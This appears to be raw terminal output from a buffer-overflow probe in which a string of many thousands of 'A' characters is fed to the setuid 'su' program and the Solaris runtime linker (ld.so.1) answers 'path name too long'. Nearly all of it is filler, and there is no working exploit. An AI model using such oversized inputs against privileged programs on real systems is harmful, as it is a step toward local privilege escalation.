AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA: path name too long
    ld.so.1: su: warning: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA